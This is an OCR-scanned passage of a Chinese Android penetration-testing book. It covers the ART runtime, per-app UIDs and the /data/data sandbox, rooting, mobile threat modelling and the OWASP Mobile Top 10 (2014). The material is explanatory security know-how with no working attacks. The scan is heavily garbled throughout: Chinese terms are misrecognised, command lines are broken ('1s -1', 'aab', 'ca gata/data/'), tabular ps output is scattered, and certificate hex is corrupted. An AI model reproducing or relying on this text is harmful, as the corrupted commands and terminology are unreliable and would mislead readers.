诗 一 个 自身 的 副本 。 这 种 启动 新 应 用 的 方法 效率 更 高 ， 速 度 更 快 。 新 启动 的 应 用 进程 会 加 载运 行 
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应 用 所 需 的 所 有 代码 。 我 们 从 前 文 了 解 到 ，classes.dex 文 件 包含 能 够 兼容 Dalv 还 虚拟 机 的 所 有 字 
节 码 。 在 使 用 安 齐 $.0 及 以 上 系统 的 最 新 版 安 卓 设备 中 ， 默 认 的 运行 时 环境 是 ART。 在 这 个 新 的 
运行 时 环境 中 ，dex2oat 工 具 会 把 classes.dex 文 件 转换 成 DAT 文件。 

















ART 一 一 新 的 安 卓 运行 时 

作为 一 个 可 选 的 运行 时 环境 ，ART 在 安 卓 4.4 系 统 中 被 首次 使 用 ， 终 端 用 户 可 以 从 设备 的 开 
发 者 选项 中 选择 ART。 从 安 卓 5.0 (Lollipop) 开始 ， 谷 歌 把 ART 当 作 默 认 的 运行 时 环境 。 用 户 在 
设备 上 安装 应 用 时 ，ART 可 以 将 应 用 的 字 节 码 转换 为 原生 机 器 码 ， 这 就 是 提前 编译 。 在 引入 ART 
之 前 ，Dalvik 会 在 应 用 运行 时 将 字 节 码 转换 为 原生 机 器 码 ， 这 就 是 即时 编译 。ART 的 优点 是 ,无 
需 在 每 次 启动 应 用 时 都 将 字 节 码 转 换 为 机 器 码 ,， 因 为 在 应 用 安装 的 过 程 中 就 已 经 完成 了 转换 。 这 
虽然 会 导致 应 用 在 第 一 次 启动 时 稍 有 延迟 , 但 是 从 下 一 次 运行 开始 , 应 用 的 性 能 就 会 得 到 大 幅度 
提升 ， 耗 电量 也 会 下 降 。 




































































3.5 理解 应 用 沙 盒 


前 几 节 详细 介绍 了 应 用 的 构建 和 运行 过 程 。 当 应 用 被 安装 到 设备 上 之 后 , 它 在 文件 系统 中 是 
什么 样子 ?为 了 保证 应 用 的 数据 不 会 受到 设备 上 其 他 应 用 的 威胁 ,谷歌 公司 采取 了 哪些 安全 措 
施 ?” 这 就 是 本 节 要 详细 介绍 的 内 容 。 





























3.5.1 一 个 应 用 对 应 一 个 VID 


安 草 系统 是 基于 Linux 内 核 的 ，Linux 的 用 户 分 离 模 式 同 样 适 用 于 安 上 车 ,但 又 和 传统 的 Linux 
略 有 不 同 。 首 先 ， 我 们 来 看 一 下 传统 的 Linux 机 器 是 如 何 给 进程 分 配 UID 的 。 


我 以 root 用 户 的 身份 登录 安装 了 Kali Linux 系 统 的 计算 机 ， 并 运行 如 下 两 个 进程 。 




















口 Iceweasel 
口 Gedit 





现在 ， 可 以 查看 这 两 个 进程 的 用 户 ID ( 即 UID )， 我 们 发 现 它们 使 用 同一 
个 root UID。 为 了 进行 交叉 检验 ， 我 使 用 下 面 的 命令 过 滤 出 了 以 root UID 运 行 


Q 的 进程 | 
ps -U root | grep 'iceweasel\|gedit' 


ps -U root : Shows all the process running with UID root 
grep 'iceweasel\|gedit' : filters the output and finds 
the specified strings. 








FN 





进程 在 同一 个 UID 下 运行 。 


LN|gedit ' 








但 安 卓 应 用 却 并 非 如 此 ， 每 一 个 安装 在 设备 上 的 应 用 都 会 有 自己 的 UID。 这 使 得 每 个 








资源 都 被 沙 盒 化 了 ， 任 何其 


下 面 的 代码 显示 了 每 一 个 


C:\>adb shell ps |find 


u0_ail4 1366 968 
systemui 

u0_a33 1494 968 
inputmethod 

.latin 

u0_a7 1518 968 
android.gms. 
persistent 

u0_a2 1666 968 
acore 

u0_a5 1714 968 
media 

u0_a7 1731 968 
process.gapps 
u0_a7 1814 968 
android.gms 

u0_a37 1843 968 
android.apps.maps 
u0_a7 1876 968 
android.gms. 
wearable 

u0_a24 1962 968 
deskclock 

u0_a46 1976 968 
quicksearchbox 
u0_a20 2011 968 
calendar 

u0_al 2034 968 
providers.calendar 
u0_a4 2098 968 
dialer 

u0_a9 2152 968 


managedprovisioning 


他 的 应 用 都 不 外 


访问 。 








签名 的 应 用 ( 如 果 两 个 应 用 是 由 同一 个 开发 人 员 开 发 的 , 就 有 可 


使 用 了 同一 签名 的 应 
> 能 出 现 这 种 情况 ) 可 以 互相 访问 数据 。 





"40" 


642012 


606072 


721168 


601712 


599604 


723464 


847820 


664656 


696996 


600340 


594520 


602900 


596712 


599872 


593236 


68560 


40104 


61816 


39908 


37284 


67068 


70992 


52688 


40352 


33848 


28616 


32724 


33300 


29700 


27876 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


sys_epoll_ 


应 用 如 何 被 分 配 到 不 同 的 UID。 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


b73balb5 


com.android. 


com.android. 


com.google. 


android.process. 


android.process. 


com.google. 


com.google. 


com.google. 


com.google. 


com.android. 


com.android. 


com.android. 


com.android. 


com.android. 


com.android. 


日 及 
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u0_a28 2223 968 610040 37504 sys_epoll_ b73ba1lb5 S com.android. 
email 

u0_a7 2242 968 709932 55596 sys_epoll_ b73ba1b5 S com.google. 

android.gms.unstable 

u0_a30 2265 968 601140 30540 sys_epoll_ b73balb5 S com.android. 
exchange 

u0_a43 2289 968 620792 52824 sys_epoll_ b73baib5 S com.google. 

android.apps. 

messaging 

u0_a8 2441 968 621016 50200 sys_epoll b73balb5 S com.android. 
launcher3 

C:\> 


观察 上 述 输 出 的 第 一 列 , 你 会 发 现 每 一 个 已 安装 的 应 用 都 会 以 一 个 不 同 的 用 户 身份 运行 , 这 
ne ee name 例如 ， 电 子 邮件 应 用 的 用 户 名 是 u0_a28。 同 样 ， 我 们 也 可 以 观察 
其 他 应 用 的 用 户 名 。 


实际 上 ， 这 些 用 户 名 分 别 对 应 了 一 个 从 10000 开 始 的 UID 。 例 如 ， 用 户 u0_a28 对 应 的 UID 是 
10028。 我 们 可 以 在 一 台 已 经 ROOT 过 的 设备 中 通过 查看 /data/system/ 目 录 下 的 packages.xml 文 件 来 
进行 验证 。 


下 面 的 代码 显示 ， 这 个 文件 的 所 有 者 是 system。 












































shell@android:/ $ ls -1 /data/system/packages.xml 
-rw-rw---- system system 160652 2015-11-14 16:34 packages.xml 


shell@android:/ $ 


为 了 更 好 地 理解 这 一 点 ， 我 们 来 看 几 个 应 用 和 它们 的 UID 的 低位 。 我 已 经 安装 了 heartrate 应 
用 ， 它 的 包 和 名 T ? 























启动 该 应 用 ， 然 后 运行 ps 命令 ， 观 察 应 用 进程 的 第 一 行 。 


u0_a132 6330 163 382404 77120 ffffffff 00000000 S si.modula.android. 
instantheartrate 


如 上 所 示 ， 这 个 应 用 的 用 户 名 为 u0_al32。 我 们 可 以 在 packages.xml 文 件 中 查看 它 的 UID 的 
低位 。 


<package name="si.modula.android.instantheartrate" 
codePath="/data/app/si.modula.android.instantheartrate-1l.apk" 
nativeLibraryPath="/data/data/si.modula.android.instantheartrate/lib" 
flags="0"ft="151013alf08" it="151013a2db1" ut="151013a2db1" 
version="2700"userId="10132"> 

“sigs count] "1"> 

<cert index="10" 
key="308202153082017ea00302010202044bedb53a300d06092a864886£70d0101050500304£310b3 
00906035504061302534931123010060355040713094c6a75626c6a616e6131163014060355040a130 
d4d6£64756c6120642e6 £2e6£2e311430120603550403130b5065746572204b75686172301e170d313 
0303531343230343032365a170d3335303530383230343032365a304f310b300906035504061302534 
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931123010060355040713094c6a75626c6a616e6131163014060355040a130d4d6£64756c6120642e6 
£2e6£2e311430120603550403130b5065746572204b7568617230819F300d06092a864886£70d01010 
1050003818d003081890281810085bc0e5459c5d09bf9 4bdd£5£599b3328d53 fbdac876b7c£17288a4 
4d09f8dfcf51d004c7dec353872940£101d83a53b1c050990a863db402249fe57349a2clba2ef49al16 
40755808e8b78593d81ab859aa3614ef £02d4d3 8d2ea042101la8eccc166cd187d66be2075b£89d993c 
6e€94080d1cb47d410b6£42931bc39£a4674£70203010001300d06092a864886£70d010105050003818 
10008a7be43 861lebf10afc8918da2b9b63 £547 7abec4bcea8ab8b6b1d97bae4ee71969d692a3112£26 
9b7ce2834984f6e30296bdclbe8beb1b5c369158240da1la915a324b6d69ceab650e6754d95£3334Eb9F 
ab4e6c1715668560a3c£7 £af159322a3b578e70579652b9b3 £91a8e419d06e7e58bb16e4a2a77b6030 
c4b7a064a251c" /> 

</sigs> 

<perms> 

<item name="android.permission.CAMERA" /> 

<item name="android.permission.ACCESS_NETWORK_STATE" /> 

<item name="android.permission.FLASHLIGHT" /> 

<item name="android.permission.INTERNET" /> 

</perms> 

</package> 


如 果 你 看 到 了 userIgd="10132" 字 段 ， 这 意味 着 用 户 名 为 u0_a132 的 应 用 对 应 的 UID 是 10132。 


我 们 再 来 看 一 个 预 装 应 用 。 下 面 这 个 包 名 为 com.sonyericsson.notes 的 应 用 是 索尼 设备 的 预 装 
应 用 。ps 命 令 显 示 其 分 配 到 的 UID 是 u0_a77。 


u0_a77 6544 163 308284 30916 ffffffff 00000000 S com.sonyericsson. 
notes 


下 面 我 们 来 看 一 下 packages.xml 文 件 。 


<package name="com.sonyericsson.notes" codePath="/system/app/SemcNotes.apk" 
nativeLibraryPath="/data/data/com.sonyericsson.notes/lib" flags="1" 
ft="13c933e4830" it="13c933e4830" ut="13c933e4830"version="1" userId="10077"> 
<sigs count="1"> 

<cert index="1" /> 

</sigs> 

</package> 


如 上 所 示 ， 它 的 UID 是 10077。 





















































3.5.2 ”应 用 沙 盒 


一 个 应 用 在 /data/data/ 文 件 夹 中 都 有 各 自 存储 数据 的 入 口 。 如 前 文 所 述 , 每 一 个 应 用 都 对 其 
拥有 特定 的 所 有 权 。 


下 面 的 代码 显示 了 /data/data/ 文 件 夹 中 的 每 个 应 用 的 数据 是 如 何 独 立 存 储 在 各 自 的 沙 盒 
中 的 。 由 于 受 限 的 用 户 无 法 访问 /data/data/ 文 件 夹 ， 所 以 我 们 需要 一 个 已 经 ROOT = 
拟 需 来 进行 观察 。 


(1) 使 用 aab 在 ROOT 过 的 设备 上 获取 一 个 shell; 
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(2) 使 用 ca gata/data/ 命 令 进 入 /data/data 文 件 来 ; 
(3) 输入 1s -1 命令 。 


下 面 的 代码 显示 了 在 data/data/ 文 件 夹 中 执行 1s -1 命令 的 输出 结果 。 





drwxr-x--x u0_a2 u0_a2 1981-07-11 12:36 com.android. 
backupconfirm 

drwxr-x--x u0_a3 u0_a3 1981-07-11 12:36 com.android. 
bluetooth 

drwxr-x--x u0_a5 u0_a5 2015-11-13 15:42 com.android. 
browser 

drwxr-x--x u0_a6é u0_a6 2015-10-28 13:27 com.android. 
calculator2 

drwxr-x--x u0_a72 u0_a72 1981-07-11 12:39 com.android. 
calendar 

drwxr-x--x u0_a9 u0_a9 2015-11-14 02:14 com.android. 
certinstaller 

drwxr-x--x u0_all u0_a11 2015-11-13 15:38 com.android. 
chrome 

drwxr-x--x u0_a17 u0_a17 2015-10-29 04:33 com.android. 
defcontainer 

drwxr-x--x u0_a75 u0_a75 1981-07-11 12:39 com.android. 
email 

drwxr-x--x u0_a24 u0_a24 1981-07-11 12:38 com.android. 
exchange 

drwxr-x--x u0_a31 u0_a31 1981-07-11 12:36 com.android. 
galaxy4 

drwxr-x--x u0_a40 u0_a40 1981-07-11 12:36 com.android. 
htmlviewer 

drwxr-x--x u0_a47 u0_a47 1981-07-11 12:36 com.android. 
magicsmoke 

drwxr-x--x u0_a49 u0_a49 1981-07-11 12:39 com.android. 
musicfx 

drwxr-x--x u0_a106 u0_a106 1981-07-11 12:36 com.android. 
musicvis 

drwxr-x--x u0_a50 u0_a50 1981-07-11 12:36 com.android. 
noisefield 

drwxr-x--x u0_a57 u0_a57 2015-10-31 03:40 com.android. 
packageinstaller 

drwxr-x--x u0_a59 u0_a59 1981-07-11 12:36 com.android. 
phasebeam 

drwxr-x--x radio radio 1981-07-11 12:39 com.android. 
phone 

drwxr-x--x u0_a63 u0_a63 1981-07-11 12:36 com.android. 
protips 

drwxr-x--x u0_al u0_al 1981-07-11 12:36 com.android. 
providers. 

applications 

drwxr-x--x u0_a7 u0_a7 1981-07-11 12:38 com.android. 
providers.calendar 

drwxr-x--x u0_al u0_al 1981-07-11 12:39 com.android. 


providers.contacts 
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drwxr-x--x u0_a37 u0_a37 1981-07-11 12:37 com.sonyericsson. 
music.youtubeplugin 

drwxr-x--x u0_a77 u0_a77 2015-10-28 13:22 com.sonyericsson. 
notes 

drwxr-x--x u0 al25 u0_a125 1981-07-11 12:37 com.sonyericsson. 
orangetheme 

drwxr-x--x u0_a78 u0_a78 1981-07-11 12:36 com.sonyericsson. 
photoeditor 

drwxr-x--x u0_a126 u0_a126 1981-07-11 12:37 com.sonyericsson. 
pinktheme 





观察 上 述 输出 结果 中 的 文件 权限 , 你 会 发 现 每 个 应 用 的 目录 都 归 它 自己 所 有 , 其 他 应 用 不 能 
读 写 这 些 目录 。 





3.5.3 是否 有 方法 打破 沙 盒 限 制 


谷歌 公司 表示 :“ 与 其 他 所 有 安全 特性 一 样 ， 应 用 沙 盒 并 不 是 牢 不 可 破 的 。 但 是 ， 想 要 在 一 
台 配 置 正 常 的 设备 上 打破 应 用 沙 盒 的 限制 ， 你 必须 牺牲 Linux 内 核 的 安全 性 。 


这 样 ， 我 们 就 会 自然 而 然 地 讨论 到 安 卓 root 技 术 ， 它 能 让 用 户 拥有 root 权 限 ， 并 且 能 够 满足 
用 户 对 安 卓 系统 的 大 部 分 需求 。 


在 使 用 Linux ( 以 及 UNIX ) 系统 的 计算 机 上 ，root 是 最 高 级 的 用 户 ， 它 拥有 最 高 的 权限 来 执 
行 任何 任务 。 安 卓 系 统 默认 只 有 Linux 内 核 和 少量 的 核心 应 用 能 够 以 root 身 份 运行 。 但 是 如 果 你 
ROOTT 了 设备 ,那么 root 用 户 就 会 对 设备 上 的 所 有 应 用 开放 。 所 以 ,拥有 root 权 限 的 用 户 或 者 应 用 
都 可 以 突破 沙 盒 环境 的 限制 ， 进 而 修改 安 卓 系统 (包括 内 核 ) 中 的 其 他 任意 部 分 , 包括 应 用 及 其 
数据 。 


第 2 章 已 经 详细 介绍 了 安 卓 ROOT 的 概念 。 







































































3.6 小 结 


本 童 深入 讨论 了 安 卓 应 用 的 内 部 构造 。 了 解 应 用 内 部 构造 的 细节 有 助 于 学 习 安 卓 安全 技术 ， 
本 童 尝试 向 读者 解释 了 这 些 概 念 。 下 一 章 将 介绍 攻击 安 章 应 用 的 概况 。 


第 4 章 


安 卓 应 用 攻击 概览 














本 章 主 要 介绍 安 卓 攻 击 面 ， 包 括 可 能 针对 安 卓 应 用 、 设 备 以 及 应 用 构架 中 其 他 组 件 的 攻击 。 
实际 上 ,我 们 会 针对 传统 应 用 构建 一 个 简单 的 威胁 模型 ,这 些 传统 应 用 通过 网 络 进行 数据 库 通信 。 
我 们 还 需要 了 解 应 用 可 能 遇 到 的 威胁 ， 只 有 这 样 我 们 才能 知道 在 渗透 测试 中 应 该 测试 什么 内 容 。 
本 章 是 一 篇 高 度 凝练 的 综述 ， 包 含 的 技术 细节 内 容 相 对 较 少 。 


本 章 包 含 以 下 主要 内 容 。 


口 安 卓 应 用 简介 

O 移动 应 用 威胁 建 模 

口 OWASP 移 动 应 用 十 大 风险 概述 
口 安 卓 应 用 自动 化 测试 工具 简介 


有 很 多 种 方法 可 以 攻击 移动 设备 。 例 如 ,利用 内 核 漏洞 ,攻击 有 漏洞 的 应 用 , 诱导 用 户 下 载 
并 运行 恶意 软件 ， 进 而 穷 取 设备 中 的 用 户 数 据 ， 运行 配置 错误 的 服务 ,等 等 。 虽然 有 很 多 种 方法 
可 以 攻击 安 卓 系统 , 但 本 章 主要 介绍 针对 应 用 层 的 攻击 。 我 们 将 讨论 多 个 用 于 测试 和 保障 移动 应 
用 安全 的 标准 和 指南 ， 而 且 本 章 是 本 书后 几 章 的 基础 。 






































41 安 卓 应 用 简介 
根据 开发 方式 的 不 同 ， 安 卓 应 用 大 臻 分 为 三 种 。 


口 Web 应 用 
口 原生 应 用 
口 混合 应 用 








4.1.1 Web 应 用 
顾名思义 ，Web 应 用 是 通过 使 用 JavaScript、HTML5 等 Web 技 术 来 实现 交互 、 导 航 以 及 个 性 化 
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功能 的 。Web 应 用 可 以 在 移动 设备 的 Web 浏 览 器 中 和 运行， 并 通过 向 后 台 服 务 器 请 求 Web 页 面 来 进 
行 泻 当 。 一 个 应 用 可 以 有 浏览 需 泻 染 的 版 本 ， 也 可 以 有 作为 独立 应 用 的 版 本 ， 这 种 现象 很 常见 ， 
因为 这 样 可 以 避免 重复 开发 。 














4.1.2 ”原生 应 用 


不 同 于 Web 应 用 ,原生 应 用 具有 优良 的 性 能 和 高 度 的 可 靠 性 。 原 生 应 用 不 需要 从 服务 器 获取 
支持 ,而且 还 能 利用 安 卓 系统 提供 的 高 速 本 地 支持 ,所 以 原生 应 用 的 响应 速度 很 快 。 男 外 ， 用户 
不 连接 网 络 也 能 使 用 某 些 应 用 。 但 是 , 使 用 原生 技术 开发 的 应 用 不 能 够 跨 平台 ,只 能 使 用 某 一 特 
定 平台 进行 开发 。 所 以 ， 一 些 企业 开始 寻求 能 够 避免 重复 工作 的 跨 平 台 移动 应 用 开发 解决 方案 。 
































4.1.3 混合 应 用 
用 


混合 应 用 尝试 综合 利用 原生 应 用 和 Web 应 用 的 优点 ， 使 用 Web 技 术 ( HIML5 、CSS 和 
JavaScript ) 编写 , 像 原生 应 用 一 样 在 设备 上 和 运行。 混合 应 用 在 原生 容器 中 运行 , 利用 设备 的 浏览 
器 引擎 (不 是 浏览 器 ) 在 本 地 泻 染 HTML ， 并 处 理 JavaScript。 混 合 应 用 能 够 通过 一 个 从 Web 应 用 
到 原生 应 用 的 抽象 层 访问 设备 上 的 接口 ， 如 加 速 器 、 摄 像 头 以 及 本 地 存储 等 ， 而 Web 应 用 则 不 能 
访问 这 些 接口 。 混 合 应 用 通常 使 用 PhoneGap 、React Native 等 框架 进行 开发 。 一 些 企 业 开 发 了 自 
己 的 容器 ， 这 种 情况 也 很 常见 。 


















































4.2 理解 应 用 攻击 面 
用 开发 出 来 后 ， 我 们 需要 提高 应 用 架构 各 个 层面 的 安全 性 。 


a 








移动 应 用 架构 


社交 类 、 银 行 类 、 娱 乐 类 等 移动 应 用 具有 很 多 需要 使 用 网 络 通信 的 功能 ， 所 以 ， 如 今 的 大 部 
分 移动 应 用 都 采用 常见 的 客户 端 -服务 絮 架 构 ， 如 下 图 所 示 。 想 要 了 解 这 类 应 用 的 攻击 面 ， 需 要 
充分 考虑 应 用 的 各 个 方面 ， 包 括 客户 端 、 后 端 API、 服 务 器 漏洞 以 及 数据 库 等 。 这 些 地方 的 任何 
一 个 入 口 都 有 可 能 对 整个 应 用 或 应 用 数据 造成 威胁 。 为 了 便于 说 明 , 我 们 假设 有 一 个 安 章 应 用 通 
过 后 端 API 连 接 服 务 器 ， 而 服务 器 又 和 数据 库 相 连接 。 
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API 调 用 
<1 
> 


移动 客户 端 服务 器 数据 库 























在 开发 软件 时 ， 建 议 你 遵循 安全 软件 开发 生命 周期 ( SDLC ) 流程 。 很 多 企业 都 采用 安全 软 
件 开 发 生命 周期 ， 从 而 保证 软件 开发 生命 周期 中 每 一 个 阶段 的 安全 性 。 


安全 软件 开发 生命 周期 能 够 帮助 企业 从 流程 的 开始 就 考虑 到 产品 的 安全 性 , 而 不 是 在 开发 完 
成 后 再 考虑 安全 性 。 遵 循 安全 软件 开发 生命 周期 能 够 降低 维护 阶段 解决 问题 的 成 本 ， 提 高 利润 。 


下 图 是 微软 公司 安全 开发 流程 的 一 部 分 , 从 图 中 可 以 看 到 , 安全 软件 开发 生命 周期 的 每 个 阶 
段 都 至 少 包 含 一 项 安全 活动 , 这 有 助 于 保证 应 用 的 安全 性 。 在 安全 软件 开发 生命 周期 中 , 企业 进 
行 安全 检查 的 方式 各 有 不 同 ， 而 且 它 们 的 成 熟 度 也 不 一 样 。 对 于 想 要 采用 这 一 方法 的 企业 来 说 ， 
下 面 的 流程 是 一 个 不 错 的 选择 。 


O 威胁 建 模 : 通过 界定 资源 、 所 提供 的 数值 以 及 可 能 攻击 资源 的 威胁 者 来 识别 应 用 的 威胁 ， 

最 好 在 应 用 设计 阶段 构建 威胁 模型 。 

口 静态 分 析 : 在 实现 阶段 ， 建 议 在 每 个 发 行 周期 对 源 代码 至 少 进 行 一 次 静态 分 析 。 这 样 能 
让 利益 相关 者 了 解 风险 的 基本 情况 ， 便 于 他 们 决定 是 接受 这 些 风险 ， 还 是 让 开发 团队 在 
应 用 正式 发 布 前 修复 这 些 问 题 。 

O 动态 分 析 : 动态 分 析 是 在 安全 软件 开发 生命 周期 的 测试 阶段 完成 的 。 动 态 分 析 是 一 种 在 

应 用 运行 过 程 中 查找 问题 的 技术 ， 能 帮助 企业 在 发 布 应 用 前 了 解 应 用 的 安全 情况 。 我 们 

将 在 后 续 章 节 中 详细 介绍 动态 分 析 ， 以 及 如 何 进 行动 态 分 析 。 



































应 急 响 


应 计划 
全 培训 。 WseBue Bs ; 弃 用 不 安 | 模糊 测试 最 终 安 


全 审查 
击 面 审查 




















下 面 介绍 一 些 需要 在 移动 应 用 设计 阶段 就 应 该 解决 的 常见 威胁 , 我 们 假设 攻击 者 拥有 设备 和 
应 用 二 进 制 文件 的 物理 访问 权限 。 
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4.3 客户 端 存在 的 威胁 


口 静态 应 用 数据 : 随 着 移动 应 用 的 出 现 ， 在 客户 端 存 储 数据 的 概念 被 广泛 采用 。 很 多 移动 
应 用 在 设备 上 存储 未 经 加 密 的 敏感 数据 ， 这 是 移动 应 用 存在 的 主要 问题 之 一 。 这 些 数据 
可 能 是 敏感 的 、 机 密 的 或 者 私人 的 。 有 多 种 方法 可 以 利用 设备 上 的 数据 ， 拥 有 设备 物理 
访问 权限 的 攻击 者 几乎 可 以 轻而易举 地 窃取 这 些 数据 。 如果 设备 已 经 ROOT 过 了 或 者 越狱 
了 ， 那 么 恶意 应 用 就 可 能 窃取 这 些 数 据 。 所 以 ， 我 们 必须 要 确保 应 用 不 在 设备 上 存储 用 
户 名 、 密 码 、 认 证 标记 、 信 用 卡号 码 等 敏感 数据 。 如 果 不 得 不 存储 这 些 数据 ， 就 必须 将 
其 加 密 , 谨防 被 攻击 者 窃取 。 我 们 将 在 第 5 章 中 详细 介绍 不 安全 的 数据 存储 中 存在 的 漏洞 。 

口 传输 中 的 应 用 数据 : 需要 与 后 全 进行 通信 的 移动 应 用 极 易 受 到 攻击 ， 攻 击 者 想 要 从 取 传 
输 中 的 数据 。 终端 用 户 经 常 连接 咖啡 店 和 机 场 的 公用 网 络 , 而 此 时 攻击 者 就 可 能 使 用 burp 
代理 、MITM 代 理 、SSL MitM 代 理 等 工具 窃取 数据 。 随 着 智能 手机 应 用 的 使 用 ， 进 行 这 
类 攻击 已 经 变 得 非常 容易 ， 因 为 无 论 去 哪里 ， 我 们 都 会 随身 携带 手机 。 

口 代码 漏洞 : 不 具有 安全 措施 的 移动 应 用 在 遭受 各 种 攻击 时 会 变 得 脆弱 不 堪 。 应 用 中 的 编 
码 错误 会 导致 严重 的 漏洞 ， 进 而 影响 用 户 数据 和 应 用 数据 安全 。 这 些 失误 的 例子 包括 导 
出 的 内 容 提供 程序 、 导 出 的 activity、 客 户 端 注入 ， 等 等 。 攻 击 场景 包括 拥有 设备 物理 访 
问 权 限 的 攻击 者 可 能 窃取 男 一 个 用 户 的 会 话 ， 设 备 中 的 恶意 应 用 可 以 读 取 其 他 应 用 中 由 
于 编码 错误 而 骏 露 的 数据 ， 能 访问 应 用 二 进 制 数据 的 攻击 者 可 能 会 对 应 用 进行 反 编译 ， 
从 而 查看 源 代 码 中 硬 编 码 的 证 书 。 

口 应 用 数据 泄漏 : 几乎 所 有 平台 的 移动 应 用 都 存在 这 一 个 问题 。 应 用 可 能 会 无 意 间 将 敏感 

数据 泄漏 给 攻击 者 ， 开 发 者 需要 格外 注意 这 一 点 。 开 发 人 员 需 要 移 除 在 开发 阶段 中 用 于 

打印 日 志 的 代码 ， 还 必须 保证 没有 容易 泄漏 的 数据 。 这 是 因为 应 用 沙 盒 不 适用 于 这 一 类 

型 中 的 某 些 攻击 。 和 譬如 ， 用 户 从 应 用 中 复制 了 像 安全 问题 答案 之 类 的 敏感 数据 ， 这 些 数 
据 就 会 被 存放 在 设备 的 剪贴 板 上 ， 而 剪贴 板 并 不 在 沙 盒 中 。 设 备 上 的 其 他 应 用 不 需要 知 
道 之 前 的 应 用 ， 就 可 以 读 取 这 些 数据 。 

口 平台 问题 : 为 移动 应 用 设计 威胁 模型 时 ， 考 虑 针对 该 应 用 运行 平台 的 威胁 很 重要 。 以 安 
卓 平 台 为 例 , 面向 安 卓 平台 开发 的 原生 应 用 很 容易 被 反 编译 , 而 且 很 容易 查看 Java 源 代码 。 
这 样 ， 攻 击 者 就 能 查看 应 用 的 源 代码 以 及 代码 中 被 硬 编码 的 敏感 数据 。 此 外 ， 攻 击 者 还 
能 修改 应 用 代码 ， 然 后 重新 编译 ， 并 把 应 用 发 布 到 第 三 方 应 用 市 场 上 。 如 果 应 用 是 敏感 
应 用 或 者 付费 应 用 ,那么 就 必须 对 应 用 进行 完整 性 检查 。 虽 然 上 述 问 题 对 iOS 这 样 的 系统 
影响 相对 较 小 ， 但 如 果 设 备 越狱 ， 那 么 也 会 存在 系统 方面 的 问题 。 









































































































































































































































4.4 后 端 存在 的 威胁 


Web 服 务 和 Web 应 用 很 类 似 ，Web 应 用 中 存在 的 所 有 漏洞 能 够 影响 Web 服 务 。 开 发 移动 应 用 
API 时 要 牢记 这 一 点 ， 下 面 是 API 中 一 些 常见 的 问题 。 
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O 身份 验证 与 授权 : 在 后 端 API 开 发 中 ,开发 人 员 经 常 创建 自 定义 刁 份 验 证 。 在 身份 验证 与 

授权 中 可 能 存在 与 之 相关 的 漏洞 。 

口 会 话 管理 : 移动 平台 通常 使 用 身份 验证 令 牌 来 管理 会 话 。 用 户 首次 登录 后 ， 会 得 到 一 个 

身份 验证 令 牌 ， 这 个 令 牌 在 接 下 来 的 会 话 中 都 会 用 到 。 如 果 身 份 验证 令 牌 在 销毁 前 没有 
得 到 妥善 保护 ， 这 就 有 可 能 导致 一 次 攻击 。 只 在 客户 端 结束 会 话 ， 而 服务 器 没有 结束 回 
话 ， 这 是 移动 应 用 男 一 个 常见 的 问题 。 

口 输入 验证 : 输入 验证 是 应 用 中 已 知 的 常见 问题 。 如 果 不 进行 输入 验证 ， 可 能 会 存在 SQL 

注入 、 命 令 注入 以 及 跨 站 脚本 攻击 等 风险 。 

O 错误 处 理 不 当 : 应 用 错误 对 攻击 者 很 有 吸引 力 。 如 果 错 误 处 理 不 当 ， 而 API 针 对 特定 的 请 

求 抛 出 数据 库 异 常 或 服务 器 异常 ， 那 么 攻击 者 就 可 能 利用 这 些 错 误 进 行 巧 妙 的 攻击 。 

口 脆弱 的 加 密 方 法 : 加 密 是 开发 者 在 开发 过 程 中 另 一 个 经 常 犯错 的 地 方 。 虽 然 各 个 平台 都 
支持 通过 加 密 的 方法 来 保证 数据 安全 ， 但 密 钥 管理 是 客户 端 存在 的 主要 问题 。 同 样 ， 也 
需要 安全 地 存储 后 台数 据 。 

口 数据 库 攻 击 : 注意 ， 攻 击 者 有 可 能 在 未 经 授权 的 情况 下 直接 访问 数据 库 。 例 如 ， 如 果 没 

有 强 认 证 保护 ， 攻 击 者 有 可 能 在 未 经 授权 情况 下 访问 phpMyAdmin 等 工具 数据 库 控制 台 ， 

另 一 个 例子 就 是 访问 未 授权 的 MongoDB 控 制 台 ,因为 MongoDB 默 认 不 需要 任何 认证 就 能 

访问 它 的 控制 台 。 








































































































45 ”移动 应 用 测试 与 安全 指南 


很 多 企业 都 提供 了 移动 应 用 测试 与 安全 指南 ， 其 中 最 常用 的 指南 包括 OWASP 移 动 应 用 十 大 
风险 和 Veracode 移 动 应 用 十 大 风险 等 。 此 外 ,谷歌 公司 也 有 自己 的 指南 ， 以 实例 的 形式 阐明 在 安 
卓 应 用 安全 中 不 应 该 做 哪些 。 了 解 这 些 指南 对 于 理解 渗透 测试 很 重要 。 


下 面 简 要 介绍 OWASP 移 动 应 用 十 大 风险 。 











4.5.1 OWASP 移动 应 用 十 大 风险 (2014) 


下 图 显示 了 OWASP 移 动 应 用 十 大 风险 ， 它 发 布 于 2014 年 ， 列 举 了 移动 应 用 十 大 漏洞 ， 下 面 
是 撰写 本 书 时 它 的 最 新 列表 。 
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OWASP 移 动 10 大 风险 


MI: IRS ae 
端 控制 

















M2: 不 安全 的 
数据 存储 


Mo; tna BP M7: 客户 端 M8: 通过 不 受 
破解 注入 m E 信任 的 输入 进 
行 安全 决策 


M9: 会 话 处 理 ff M10. 三 进 币 
不 当 


M3: 传输 层 





M4: 总 的 


保护 不 足 








MS, 糟糕 的 授 
权 和 身份 认证 








文件 保护 不 足 














下 面 是 这 十 大 大 漏洞 ， 稍 后 我 们 会 深入 了 解 每 一 个 漏洞 。 


口 M1: 弱 服 务 器 端 控制 

口 M2: 不 安全 的 数据 存储 

O M3: 传输 层 保护 不 足 

口 M4: 意外 的 数据 泄漏 

OMS: 糟糕 的 授权 和 身份 认证 

口 M6: 加 密 技术 破解 

口 M7: 客户 端 注入 

口 M8: 通过 不 受信 任 的 输入 进行 安全 决策 
口 M9: 会 话 处 理 不 当 

口 M10: 二 进 制 文件 保护 不 足 


接 下 来 主要 介绍 这 些 漏洞 。 





4.5.2 M1: 弱 服 务 器 端 控制 


弱 服 务 需 端 控制 是 指针 对 应 用 后 台 的 攻击 。 目 前 , 大 多 数 应 用 都 使 用 网 路 连接 , 并 通过 REST 
